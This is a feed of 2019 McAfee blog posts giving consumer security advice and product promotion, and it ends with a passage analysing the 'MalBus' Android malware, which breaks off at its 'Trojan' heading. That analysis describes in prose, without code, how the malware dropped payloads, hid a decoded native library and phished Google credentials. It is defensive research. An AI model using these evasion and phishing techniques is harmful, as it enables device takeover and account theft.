Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account https://securingtomorrow.mcafee.com/consumer/family-safety/valentines-alert-dont-let-scammers-break-your-heart-or-your-bank-account/ https://securingtomorrow.mcafee.com/consumer/family-safety/valentines-alert-dont-let-scammers-break-your-heart-or-your-bank-account/#respond Sat, 09 Feb 2019 15:02:17 +0000 https://securingtomorrow.mcafee.com/?p=94123

It’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online. The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe […]

The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blogs.

]]>

Online Dating ScamsIt’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

A single mom in her late 40s, well-educated, and attractive, Sarah’s teenager had convinced her to join a dating site the year before. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic, kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 to pay for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the numbers grew to $1,000 for rent and $3,000 for a business venture.

Online Dating Scams

Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story doesn’t just echo that of desperate, clueless people, or lonely older women. Scammers are targeting good people who still believe in and value love and companionship. The pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal information they can use over time to carry out their scam.

According to the Federal Bureau of Investigation (FBI) confidence fraud has jumped 20% in the past year despite reports and warnings — especially around this time of year.

The FBI’s Internet Crime Complaint Center (IC3) reports that romance scams top all other financial online crimes. In 2016, people reported almost 15,000 romance scams to IC3 (nearly 2,500 more than the previous year), with losses exceeding $230 million.

Tips for Safe Online Dating

Never send money. Be it a romantic relationship you’ve engaged with or a phishing email, no matter the sob story, do not send money to anyone online. If you do send money, put a loan agreement in place that is legally enforceable should one party default.

Suspicious behavior. If someone promises to meet you somewhere but keeps canceling or if he or she refuses to video chat, those are red flags. Technology means anyone from anywhere in the world can successfully maintain a scam.Online Dating Scams

Take things slow. If someone is pushing the pace of a relationship or too quick to declare love and talk about the future, pause and assess the situation.

Do a background check. Love is a powerful force and can easily cloud a person’s correct understanding of reality. If you dare to create a dating profile, make a deal with yourself that you will extend the same courage to doing a background check on someone.

Be a sleuth. Don’t be afraid to gather facts on someone you’ve met online. Simple steps such as Googling the person’s name or dropping their photo in Google’s Reverse Image Search will help you get a better understanding of a person. Have faith: Good, legitimate people do exist. However, if there’s anything dubious, it’s best to find it out earlier rather than later. Part of doing your homework is tracking down mutual friends and making inquiries about the person you are talking with online.

Keep your social profiles private. Experts agree that you should edit your online footprint before you start dating people you’ve met online. Making your Instagram, Twitter, and Facebook private will guard you against potential.

Never send racy photos. Some scammers gain the confidence of their victims with every intention of extorting them in the future. They will threaten to send any racy photos with your family, friends, or business associates. The best way to avoid this is to never, ever send racy photos to anyone.Online Dating Scams

Google yourself, restrict info. Google yourself to see if there are any digital breadcrumbs that give away your home address or phone number. If possible, delete or revise that info. Likewise, go through your social accounts and remove any personal information you’ve shared in the past. Digital stalking is a risk for people who date online so turn off GPS on your dating apps and make sure your profile information is vague. Even if you get comfortable online with others, never get too comfortable since apps have privacy loopholes that can easily be exploited by hackers.

Take solid precautions. Enlist at least one friend as your dating safety pal. This will be the person who knows where you are going, who you will be with, and the background on the person you are meeting. Ask that person to check in with you during the date and carry pepper spray or a taser for physical protection. Go the extra step and turn on your Friend Finder or a location app that allows safety friend to track your whereabouts during a date.

*Names have been changed

The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/valentines-alert-dont-let-scammers-break-your-heart-or-your-bank-account/feed/ 0
How Online Gamers Can Play It Safe https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/how-online-gamers-can-play-it-safe/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/how-online-gamers-can-play-it-safe/#respond Fri, 08 Feb 2019 23:23:47 +0000 https://securingtomorrow.mcafee.com/?p=94146

Online gaming has grown exponentially in recent years, and scammers have taken note. With the industry raking in over $100 billion dollars in 2017 alone[1], the opportunity to funnel some money off through fraud or theft has proven irresistible to the bad guys, leaving gamers at greater risk. From malware and phishing scams, to phony […]

The post How Online Gamers Can Play It Safe appeared first on McAfee Blogs.

]]>

Online gaming has grown exponentially in recent years, and scammers have taken note. With the industry raking in over $100 billion dollars in 2017 alone[1], the opportunity to funnel some money off through fraud or theft has proven irresistible to the bad guys, leaving gamers at greater risk.

From malware and phishing scams, to phony game hacks, identity theft, and more, gamers of all stripes now face a minefield of obstacles online and in real life. So, if you’re going to play games, it’s best to play it safe.

Here’s what to look out for:

Dodgy Downloads

Gamers who play on their computer or mobile device need to watch out for dangerous links or malicious apps disguised as popular or “free” games. Hackers often use innocent-looking downloads to deliver viruses and spyware, or even sign you up for paid services, without your consent. In one prominent case, more than 2.6 million Android users downloaded fake Minecraft apps that allowed hackers to take control of their devices.

Researchers have even discovered a ransomware threat that targets gamers. TeslaCrypt was designed to encrypt game-play data until a ransom is paid. Originally distributed through a malicious website, it has since been circulating via spam.

And while it’s true that game consoles like PlayStation and Xbox aren’t as vulnerable to viruses, since they are closed systems, that doesn’t mean that their users don’t face other risks.

Social Scams

Players on any platform could wind up with malware, sent directly from other players via chat messages. Some scammers use social engineering tricks, like inviting other players to download “helpful” tools that turn out to be malware instead. When you consider that 62% of kids play games where they speak to others, the odds of a risky interaction with a stranger seems quite real.

Players of the Origin and Steam services, for instance, were targeted by hackers posing as other players, inviting them to play on their teams. Over chat message, they suggested the players download an “audio tool” that turned out to be a keystroke logger, aimed at stealing their access credentials for the game.

Other social scams include malicious YouTube videos or websites, offering game bonuses and currency, for free.

Another widespread social threat is account takeover, or ATO for short. This is when a scammer hacks a real account in order to post spammy links, and scam messages that appear to come from a trusted contact. Some accounts, for games like League of Legends, have even been stolen and sold online for money because they boasted a high level, or rare skins.

Phishing

Finally, be on the lookout for phishing websites, offering free games or bonuses, or phishy emails prompting you to login to your account, with a link leading to a copycat gaming site. Often, these are designed to steal your login credentials or distribute fake games that contain malware.

Players of the wildly popular Fortnite, for example, have been particularly targeted. The latest phishing scam is aimed at stealing the third-party sign-in tokens that allow cybercriminals to access a user’s account, and the payment details associated with it.

So now that you know about a little more about gaming threats, here’s how to win at playing it safe:

  1. Do Your Research—Before downloading any games from the Internet or app stores, make sure to read other users’ reviews first to see that they are safe. This also goes for sites that sell game hacks, credits, patches, or virtual assets typically used to gain rank within a game. Avoid illegal file-sharing sites and “free” downloads, since these are often peppered with malware. It’s always best to go for a safer, paid option from a reputable source.
  2. Play Undercover— Be very careful about sharing personal information, in both your profile information, and your chat messages. Private information, such as your full name, address, pet’s name, school, or work details, could be used to guess your account password clues, or even impersonate you. Consider playing under an alias.
  3. Be Suspicious—Since scammers use the social aspect of games to fool people, you need to keep your guard up when you receive messages from strangers, or even read reviews.
    Some YouTube and social media reviews are placed there to trick users into thinking that the game or asset is legitimate. Dig deep, and avoid looking for free hacks. Ask gamers you know in real life for recommendations that worked for them.
  4. Protect Yourself—Avoid using older versions of games, and make sure that games you do play are updated with patches and fixes. And if you think a gaming account may already have been compromised, change your passwords immediately to something unique and complex.Safeguard your computers and devices from known and emerging threats by investing in comprehensive security software, and keep yourself up-to-date on the latest scams.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

[1]According to The 2017 Year In Review Report by SuperData

The post How Online Gamers Can Play It Safe appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/how-online-gamers-can-play-it-safe/feed/ 0
Your Mobile Phone: Friend or Foe? https://securingtomorrow.mcafee.com/business/endpoint-security/your-mobile-phone-friend-or-foe/ https://securingtomorrow.mcafee.com/business/endpoint-security/your-mobile-phone-friend-or-foe/#respond Wed, 06 Feb 2019 16:00:29 +0000 https://securingtomorrow.mcafee.com/?p=93999

Where would we be without our mobile phones?  Our kids, boss, friends – so many people reach out to us via our mobile phone.  And unfortunately, hackers have also started reaching out – in major ways. The severity of attacks on mobile devices is often underestimated. It is now common to have employees use their […]

The post Your Mobile Phone: Friend or Foe? appeared first on McAfee Blogs.

]]>

Where would we be without our mobile phones?  Our kids, boss, friends – so many people reach out to us via our mobile phone.  And unfortunately, hackers have also started reaching out – in major ways. The severity of attacks on mobile devices is often underestimated. It is now common to have employees use their phones for work-related tasks when they are not within the perimeter of their corporate firewall, giving cybercriminals the opportunity to access sensitive information if and when they hack into an employee’s phone. Let’s take a closer look at some of the common mobile threats that put your business at risk and how to prevent them.

App-Based Threats

Although new mobile malware declined by 24% in Q3 2018, per our latest Quarterly Threats Report, app-based threats still dominate the threat landscape. Malicious actors use social engineering techniques by asking users to update their applications by uninstalling the real app and re-installing a malicious one. With one click, malware can be installed on your mobile device.

Many app-based threats can evolve into more insidious attacks and can go beyond exploiting your personal information. An attacker’s initial goal is to get access and all they need is one vulnerable employee to fall victim to an app-based threat. Once the attacker gains access to an employee’s personally identifiable information (PII) or credentials, they can hijack accounts, impersonate the employee, and trick other employees into divulging even more sensitive corporate data.

Late last year, the McAfee Mobile Research team discovered an active phishing campaign that uses text messages (SMS) to trick users into downloading and installing a fake voice-message app. The app allowed cybercriminals to use infected devices as network proxies without the users’ knowledge.

This year, we expect to see an increase in underground discussions on mobile malware—mostly focused on Android—regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security.

Risky Wi-Fi Networks

Using public Wi-Fi is one of the most common attack vectors for cybercriminals today. With free public Wi-Fi widely available in larger cities, it has become a convenient way to access online accounts, check emails, and catch up on work while on the go. The industry has seen network spoofing increase dramatically in the past year. To put this into perspective, picture a hacker setting up a rogue access point in a public place like your local bank. A hacker will wait for you to connect to Wi-Fi that you think is a trusted network. Once the hacker gains access, they’re connected to your mobile device. They’ll watch remotely as you access sensitive information, revealing log-in credentials, confidential documents, and more.

Whether you are at home or working remotely, network security needs to be a high priority.

Device Attacks

Cybercriminals have various ways of enticing users to install malware on their mobile devices. Ad and click fraud is a growing concern for device attacks, where criminals can gain access to a company’s internal network by sending an SMS phish. These types of phishing attempts may start as adware, but can easily spread to spyware to the entire botnet.

Another growing concern with mobile device threats is when malware is hidden in other IoT devices and the information obtained by the hacker can be used as an entry point to your mobile device or your company network. With IoT malware families rapidly being customized and developed, it’s important for users to be aware and know how to protect themselves.

How to Better Protect Your Mobile Device

 

Mobile devices have all the organizational information that traditional endpoints have. McAfee® MVISION Mobile lets you protect against threats to your employees and your data on iOS and Android devices like you do on your PCs. With MVISION Mobile, you can manage the defense of your mobile devices alongside your PCs, IoT devices, servers, and cloud workloads inside McAfee ePolicy Orchestrator (McAfee ePO) with unified visibility into threats, integrated compliance reporting, and threat response orchestration.

The most comprehensive mobile device security is on the device itself, and MVISION Mobile delivers unparalleled on-device protection. Visit our web site for more information, and a product tour.

The post Your Mobile Phone: Friend or Foe? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/your-mobile-phone-friend-or-foe/feed/ 0
Should you pull your smart plug? https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/should-you-pull-your-smart-plug-2/ https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/should-you-pull-your-smart-plug-2/#respond Tue, 05 Feb 2019 17:00:50 +0000 https://securingtomorrow.mcafee.com/?p=94030

While some may think, “why would I need my toaster to connect to the internet,” smart home devices continue to become more and more popular. In fact, a recent study by Intel found that by 2025, 71% of Americans will have at least one smart device in their home. For many that aren’t ready to […]

The post Should you pull your smart plug? appeared first on McAfee Blogs.

]]>

While some may think, “why would I need my toaster to connect to the internet,” smart home devices continue to become more and more popular. In fact, a recent study by Intel found that by 2025, 71% of Americans will have at least one smart device in their home. For many that aren’t ready to replace their favorite “dumb” appliances, smart plugs are an easy and affordable way to connect anything. But, do they leave your virtual “front door” wide open for cybercriminals? 

In the latest episode of “Hackable?” our host Geoff Siskind and the team investigate just how risky smart plugs are for homeowners. Can just one weak link compromise your entire home network? To find out, Geoff invites a white-hat to hack the smart plug in his studio. Learn if your smart home and devices are at risk.      
 

Listen now to the award-winning podcast “Hackable?” on Apple Podcasts!     

 

 


The post Should you pull your smart plug? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/should-you-pull-your-smart-plug-2/feed/ 0
Should you pull your smart plug? https://securingtomorrow.mcafee.com/consumer/should-you-pull-your-smart-plug/ https://securingtomorrow.mcafee.com/consumer/should-you-pull-your-smart-plug/#respond Tue, 05 Feb 2019 17:00:30 +0000 https://securingtomorrow.mcafee.com/?p=94026

While some may think, “why would I need my toaster to connect to the internet,” smart home devices continue to become more and more popular. In fact, a recent study by Intel found that by 2025, 71% of Americans will have at least one smart device in their home. For many that aren’t ready to […]

The post Should you pull your smart plug? appeared first on McAfee Blogs.

]]>

While some may think, “why would I need my toaster to connect to the internet,” smart home devices continue to become more and more popular. In fact, a recent study by Intel found that by 2025, 71% of Americans will have at least one smart device in their home. For many that aren’t ready to replace their favorite “dumb” appliances, smart plugs are an easy and affordable way to connect anything. But, do they leave your virtual “front door” wide open for cybercriminals? 

In the latest episode of “Hackable?” our host Geoff Siskind and the team investigate just how risky smart plugs are for homeowners. Can just one weak link compromise your entire home network? To find out, Geoff invites a white-hat to hack the smart plug in his studio. Learn if your smart home and devices are at risk.      
 

Listen now to the award-winning podcast “Hackable?” on Apple Podcasts!     

 

 


The post Should you pull your smart plug? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/should-you-pull-your-smart-plug/feed/ 0
Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates https://securingtomorrow.mcafee.com/business/australian-cybersecurity-firm-experiences-exciting-times-as-clients-shift-to-cloud-accelerates/ https://securingtomorrow.mcafee.com/business/australian-cybersecurity-firm-experiences-exciting-times-as-clients-shift-to-cloud-accelerates/#respond Tue, 05 Feb 2019 15:00:38 +0000 https://securingtomorrow.mcafee.com/?p=93996

Patrick Butler, CEO of the Australian cybersecurity firm Loop Secure, is excited about how the cloud is growing his business. His clients are enthused too by the tremendous opportunities and advantages the cloud presents. They’re also a little scared. “Every year more companies are digitizing all aspects of their business—from manufacturing plants coming online to […]

The post Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates appeared first on McAfee Blogs.

]]>

Patrick Butler, CEO of the Australian cybersecurity firm Loop Secure, is excited about how the cloud is growing his business. His clients are enthused too by the tremendous opportunities and advantages the cloud presents. They’re also a little scared.

“Every year more companies are digitizing all aspects of their business—from manufacturing plants coming online to new ways of serving up information to customers,” says Butler, whose firm provides a full range of cybersecurity services, from one-time red team engagements to managing security operations, primarily for midsize enterprises. “It’s exciting what technology can do to transform what we do with computers. … We’re seeing a huge uptake in collaboration technology, with a lot of customers moving to AWS [Amazon Web Services].”

But Butler acknowledges his clients’ fears—putting sensitive data in the cloud introduces new risks. “Our job is to help customers leverage digital transformation positively without having to worry about the risks, [such as] breaches and brand reputation damage,” he says. “We’ve had to focus on how we protect them in [the cloud and] those areas of their business—areas that have traditionally been quite dark.”

The Challenge of Securing the Cloud

“Setting up security for the cloud can be quite technical,” Butler explains. “There are a lot of configuration options. … Yes, the cloud brings a lot of speed and scale, but one wrong configuration and suddenly you have an AWS S3 bucket available to the broader public with all of your confidential information on it. The cloud brings benefits, but it also brings new and different risks.”

Confidently Securing the Cloud with Help from McAfee

As one of the longest-running cybersecurity companies in Australia, Loop Secure has been a McAfee partner for over a decade. For its clients moving operations into the cloud, the firm primarily uses McAfee solutions to help them reach their security objectives—easily and effectively. For instance, for a midsize services client, Loop Secure implemented McAfee® Virtual Network Security Platform (McAfee vNSP), a complete network threat and intrusion prevention system (IPS) built for the unique demands of private and public clouds. Using McAfee vNSP allowed the company to apply the same robust security policies to endpoints within AWS as on premises.

“What McAfee brings to the table is a comprehensive portfolio, scale, and focus,” Butler explains. “Like us, McAfee focuses only on cybersecurity. That’s important. … To us, the McAfee ‘Together is Power’ mantra means that with McAfee we have a broader team—our people plus McAfee people and products—all dedicated to keeping our clients’ data and environments safe.”

Many of Butler’s clients use McAfee endpoint, networking, and/or web protection solutions and McAfee ePolicy Orchestrator® (McAfee ePO™). In the near future, Butler looks forward to offering them McAfee MVISION, an innovative, integrated, open system from device to cloud. McAfee MVISION could simplify security for these Loop Secure customers by providing consolidated visibility, comprehension, and control across their entire digital estate.

With the acceleration of cloud adoption by its clients and McAfee’s device-to-cloud approach, “The future’s pretty exciting for both us and McAfee,” Butler says.

View below for a short video interview with Patrick Butler. Get your questions answered by tweeting @McAfee_Business.

The post Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/australian-cybersecurity-firm-experiences-exciting-times-as-clients-shift-to-cloud-accelerates/feed/ 0
Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/facebook-messaging-merge/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/facebook-messaging-merge/#respond Tue, 05 Feb 2019 14:00:25 +0000 https://securingtomorrow.mcafee.com/?p=94069

Integration: it seems to be all the rage. As technology becomes more sophisticated, we sprint to incorporate these new innovations into our everyday lives. But as we celebrate Safer Internet Day, one can’t help but wonder, is all integration good when it comes to information shared online? Major privacy concerns have been raised surrounding Facebook’s […]

The post Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety appeared first on McAfee Blogs.

]]>

Integration: it seems to be all the rage. As technology becomes more sophisticated, we sprint to incorporate these new innovations into our everyday lives. But as we celebrate Safer Internet Day, one can’t help but wonder, is all integration good when it comes to information shared online? Major privacy concerns have been raised surrounding Facebook’s recent plans to merge Messenger, WhatsApp, and Instagram. This integration will allow cross-messaging between the three platforms (which will all still operate as standalone apps), so users could talk to their Messenger-only friends without leaving WhatsApp.

While Facebook’s plans to merge the messaging platforms are not yet finalized, the company is in the process of rebuilding the underlying infrastructure so that users who might utilize only one of the apps will be able to communicate with others within the company’s ecosystem. Facebook plans to include end-to-end encryption for the apps, ensuring that only the participants of a conversation can view the messages being sent. By allowing each app to speak to one another across platforms, Facebook hopes users become more engaged and use this as their primary messaging service.

But Facebook’s messaging changes have greater implications for online safety as consumers become more protective of their data. For example, WhatsApp only requires a phone number to sign up for the app while Facebook asks users to verify their identities. Will this force more data to be shared with WhatsApp, or will its encryption become less secure? While nothing has been finalized, it’s important for users to think about how the information they share online could be affected by this merge.

Although the internet has paved the way for advancements in social media and technology in general, users need to make sure they’re aware of the potential risks involved. And while this merge hasn’t happened yet, Safer Internet Day helps remind us to make good choices when it comes to browsing online. Following these tips can help keep you and your data safe and secure:

  • Get selective about what you share. Although social media is a great way to keep your friends and family in the loop on your daily life, be conservative about the information you put on the internet. Additionally, be cautious of what you send through messaging platforms, especially when it comes to your personally identifiable information.
  • Update your privacy settings. To make sure that you’re sharing your status with just your intended audience, check your privacy settings. Choose which apps you wish to share your location with and turn your profiles to private if you don’t want all users to have access to your information.
  • Keep your apps up-to-date. Keeping your social media apps updated can prevent exposure to threats brought on by software bugs. Turn on automatic updates so you always have the latest security patches, and make sure that your security software is set to run regular scans.
  • Click with caution. Cybercriminals can leverage social media messaging to spread phishing links. Don’t interact with users or messages that seem suspicious and keep your guard up by blocking unfamiliar users who try to send you sketchy content.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help block malware and phishing sites if you accidentally click on a malicious link. This can help protect you from potential threats when you access your social channels from a desktop or laptop.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/facebook-messaging-merge/feed/ 0
Safer Internet Day 2019 – Together for a Better Internet https://securingtomorrow.mcafee.com/consumer/safer-internet-day-2019/ https://securingtomorrow.mcafee.com/consumer/safer-internet-day-2019/#respond Tue, 05 Feb 2019 00:15:17 +0000 https://securingtomorrow.mcafee.com/?p=94075

What You Can Do Today to Help Create a Better Internet   Today is Safer Internet Day (SID) – an annual worldwide event to encourage us all to work together to create a better internet. Celebrated globally in over 130 countries, SID is an opportunity for millions of people worldwide to come together to inspire […]

The post Safer Internet Day 2019 – Together for a Better Internet appeared first on McAfee Blogs.

]]>

What You Can Do Today to Help Create a Better Internet

 

Today is Safer Internet Day (SID) – an annual worldwide event to encourage us all to work together to create a better internet. Celebrated globally in over 130 countries, SID is an opportunity for millions of people worldwide to come together to inspire positive change and raise awareness about the importance of online safety.

The theme for 2019 is: ‘Together for a Better Internet’ which I believe is a timely reminder of the importance of us all working together if we are serious about making the internet a safer place. Whether we are parents, carers, teachers or just avid users, we all have a part to play.

The 4R’s of Online Safety

In order to make a positive change to our online world, this year we are being encouraged to focus on four critical skills that many experts believe will help us all (especially our kids) better navigate the internet and create a more positive online environment. Let’s call them the 4R’s of online safety: Respect, Responsibility, Reasoning and Resilience. So, here is my advice on what we can do to try and incorporate these four important skills into our family’s digital lives

  1. Respect – ‘I treat myself and others the way I like to be treated’

I firmly believe that having respect for others online is critical if we are going to foster a safer and more supportive internet for our children and future generations. While many parents realise that our constant reminders about the importance of good manners and respect must also now be extended to include the online world, not everyone is on the same page.

Keyboard warriors who fire off abusive comments online, or harass and troll others clearly do not have any notion of online respect. Online actions can have serious real-world implications. In fact, online actions can often have more significant implications as the dialogue is not just contained to a few, rather it is witnessed by everyone’s online friends which could stretch into the 1000’s. Such public exchanges then create the opportunity for commentary which often further magnifies the hurt and fallout.

It is therefore essential that we have very direct conversations with our children about what is and isn’t appropriate online. And if there is even any confusion, always revert to one of my favourite lessons from my Sunday School days: treat others how you would like to be treated yourself.

  1. Responsibility – ‘I am accountable for my actions and I take a stand when I feel something is wrong’

In my opinion, teaching our kids online responsibility is another important step in making the internet a better place. Ensuring our kids understand that they are not only responsible but accountable for their behaviour is essential. If they harass or bully others online, or are involved in sending inappropriate pics, there are consequences that could quite possible include interactions with the police department.

But being responsible online also means getting involved if you feel something isn’t right. Whether a mate is on the receiving end of online harassment or a cruel joke, getting involved and telling the perpetrator that their behaviour ‘isn’t cool’ is essential.

  1. Reasoning – ‘I question what is real’

Teaching our kids to think critically is an essential survival skill for our kids in our content-driven online world. We need our kids to question, analyse and verify online content. They need to be able to identify reputable and credible sources and think carefully before they share and digest information.

The best thing we can do as parents is challenge our kids and get them thinking! If for example, your child is researching online for a school assignment then get them thinking. Ask them what agenda the author of the article has. Ask them whether there is a counter argument to the one laid out in the article. Ask them whether the source sharing the information is trustworthy. The aim is to teach them to question and not take anything they find online at face value.

  1. Resilience – ‘I get back up from tough situations’

Unfortunately, the chances that your child will experience some challenges online is quite high. Whether someone posts a mean comment, they are harassed, or worst case, cyberbullied – these nasty online interactions can really hurt.

Ensuring your kids know that they can come to you about any issue they experience is essential. And you need to repeat this to them regularly, so they don’t forget! And if your child does come to you with a problem they experienced online, the worst thing you can do is threaten to disconnect them. If you do this, I guarantee you that they will never share anything else with you again.

In 2014, Parent Zone, one of the UK’s leading family digital safety organisations collaborated with the Oxford Internet Institute to examine ways to build children’s online resilience. The resulting report, A Shared Responsibility: Building Children’s Online Resilience, showed that unconditional love and respect from parents, a good set of digital skills plus the opportunity for kids to take risks and develop strategies in the online world – without being overly micro-managed by their parents – were key to building online resilience.

So, love them, educate them and give them some independence so they can start to take some small risks online and start developing resilience.

What Can You Do this Safer Internet Day?

Why not pledge to make one small change to help make the internet a better place this Safer Internet Day? Whether it’s modelling online respect, reminding your kids of their online responsibilities, challenging them to demonstrate reasoning when assessing online content or working with them to develop online resilience, just a few small steps can make a positive change.

 

 

 

 

 

The post Safer Internet Day 2019 – Together for a Better Internet appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/safer-internet-day-2019/feed/ 0
MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malbus-popular-south-korean-bus-app-series-in-google-play-found-dropping-malware-after-5-years-of-development/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malbus-popular-south-korean-bus-app-series-in-google-play-found-dropping-malware-after-5-years-of-development/#respond Mon, 04 Feb 2019 18:00:12 +0000 https://securingtomorrow.mcafee.com/?p=94034

McAfee’s Mobile Research team recently learned of a new malicious Android application masquerading as a plugin for a transportation application series developed by a South Korean developer. The series provides a range of information for each region of South Korea, such as bus stop locations, bus arrival times and so on. There are a total […]

The post MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development appeared first on McAfee Blogs.

]]>

McAfee’s Mobile Research team recently learned of a new malicious Android application masquerading as a plugin for a transportation application series developed by a South Korean developer. The series provides a range of information for each region of South Korea, such as bus stop locations, bus arrival times and so on. There are a total of four apps in the series, with three of them available from Google Play since 2013 and the other from around 2017. Currently, all four apps have been removed from Google Play while the fake plugin itself was never uploaded to the store. While analyzing the fake plugin, we were looking for initial downloaders and additional payloads – we discovered one specific version of each app in the series (uploaded at the same date) which was dropping malware onto the devices on which they were installed, explaining their removal from Google Play after 5 years of development.

Figure 1. Cached Google Play page of Daegu Bus application, one of the apps in series

When the malicious transportation app is installed, it downloads an additional payload from hacked web servers which includes the fake plugin we originally acquired. After the fake plugin is downloaded and installed, it does something completely different – it acts as a plugin of the transportation application and installs a trojan on the device, trying to phish users to input their Google account password and completely take control of the device. What is interesting is that the malware uses the native library to take over the device and also deletes the library to hide from detection. It uses names of popular South Korean services like Naver, KakaoTalk, Daum and SKT. According to our telemetry data, the number of infected devices was quite low, suggesting that the final payload was installed to only a small group of targets.

The Campaign

The following diagram explains the overall flow from malware distribution to device infection.

Figure 2. Device infection process

When the malicious version of the transportation app is installed, it checks whether the fake plugin is already installed and, if not, downloads from the server and installs it. After that, it downloads and executes an additional native trojan binary which is similar to the trojan which is dropped by the fake plugin. After everything is done, it connects with the C2 servers and handles received commands.

Initial Downloader

The following table shows information about the malicious version of each transportation app in the series. As the Google Play number of install stats shows, these apps have been downloaded on many devices.

Unlike the clean version of the app, the malicious version contains a native library named “libAudio3.0.so”.

Figure 3. Transportation app version with malicious native library embedded

In the BaseMainActivity class of the app, it loads the malicious library and calls startUpdate() and updateApplication().

Figure 4. Malicious library being loaded and executed in the app

startUpdate() checks whether the app is correctly installed by checking for the existence of a specific flag file named “background.png” and whether the fake plugin is installed already. If the device is not already infected, the fake plugin is downloaded from a hacked web server and installed after displaying a toast message to the victim. updateApplication() downloads a native binary from the same hacked server and dynamically loads it. The downloaded file (saved as libSound1.1.so) is then deleted after being loaded into memory and, finally, it executes an exported function which acts as a trojan. As previously explained, this file is similar to the file dropped by the fake plugin which is discussed later in this post.

Figure 5 Additional payload download servers

Fake Plugin

The fake plugin is downloaded from a hacked web server with file extension “.mov” to look like a media file. When it is installed and executed, it displays a toast message saying the plugin was successfully installed (in Korean) and calls a native function named playMovie(). The icon for the fake plugin soon disappears from the screen. The native function implemented in LibMovie.so, which is stored inside the asset folder, drops a malicious trojan to the current running app’s directory masquerading as libpng.2.1.so file. The dropped trojan is originally embedded in the LibMovie.so xor’ed, which is decoded at runtime. After giving permissions, the address of the exported function “Libfunc” in the dropped trojan is dynamically retrieved using dlsym(). The dropped binary in the filesystem is deleted to avoid detection and finally Libfunc is executed.

Figure 6 Toast message when malware is installed

In the other forked process, it tries to access the “naver.property” file on an installed SD Card, if there is one, and if it succeeds, it tries starting “.KaKaoTalk” activity which displays a Google phishing page (more on that in the next section) . The overall flow of the dropper is explained in the following diagram:

Figure 7. Execution flow of the dropper

Following is a snippet of a manifest file showing that “.KaKaoTalk” activity is exported.

Figure 8. Android Manifest defining “.KaKaoTalk” activity as exported

Phishing in JavaScript

KakaoTalk class opens a local HTML file, javapage.html, with the user’s email address registered on the infected device automatically set to log into their account.

Figure 9. KakaoTalk class loads malicious local html file

The victim’s email address is set to the local page through a JavaScript function setEmailAddress after the page is finished loading. A fake Korean Google login website is displayed:

Figure 10. The malicious JavaScript shows crafted Google login page with user account

We found the following attempts of exploitation of Google legitimate services by the malware author:

  • Steal victim’s Google account and password
  • Request password recovery for a specific account
  • Set recovery email address when creating new Google account

An interesting element of the phishing attack is that the malware authors tried to set their own email as the recovery address on Google’s legitimate services. For example, when a user clicks on the new Google account creation link in the phishing page, the crafted link is opened with the malware author’s email address as a parameter of RecoveryEmailAddress.

Figure 11. The crafted JavaScript attempts to set recovery email address for new Google account creation.

Fortunately for end users, none of the above malicious attempts are successful. The parameter with the malware author’s email address is simply ignored at the account creation stage.

Trojan

